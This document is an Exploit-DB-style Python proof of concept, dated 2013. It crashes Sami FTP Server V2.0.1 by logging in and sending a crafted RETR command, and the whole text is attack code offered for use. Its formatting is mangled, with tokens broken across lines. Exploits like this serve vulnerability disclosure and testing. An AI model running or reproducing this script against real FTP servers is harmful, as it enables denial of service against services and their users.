#!/usr/bin/python
#
#
# Exploit Title: Sami FTP Server RETR Denial Of Service
# Date: 2013/6/09
# Exploit Author: Chako
# Vendor Homepage: http://www.karjasoft.com/old.php
# Software Link:
# Version: V2.0.1 (Doesn't work on V2.0.2)
# Tested on: Windows XP SP3
# Description:
# A bug discovered in Sami FTP Server allows an attacker
# to cause a Denial of Service using a specially crafted request.
import
socket
import
sys
USER
=
"chako"
PASSWD
=
"chako"
PAYLOAD
=
"\x41"
print
(
"\n\n[+] Sami FTP Server RETR Denial Of Service"
)
print
(
"[+] Version: V2.0.1"
)
print
(
"[+] Chako\n\n\n"
)
s
=
socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((
"127.0.0.1"
,
21
))
data
=
s.recv(
1024
)
print
(
"[-] Login to FTP Server...\n"
)
s.send(
"USER "
+
USER
+
'\r\n'
)
data
=
s.recv(
1024
)
s.send(
"PASS "
+
PASSWD
+
'\r\n'
)
data
=
s.recv(
1024
)
print
(
"[-] Sending exploit...\n"
)
s.send(
"RETR "
+
PAYLOAD
+
'\r\n'
)
s.close()
print
(
"[!] Done! Exploit successfully sent\n"
)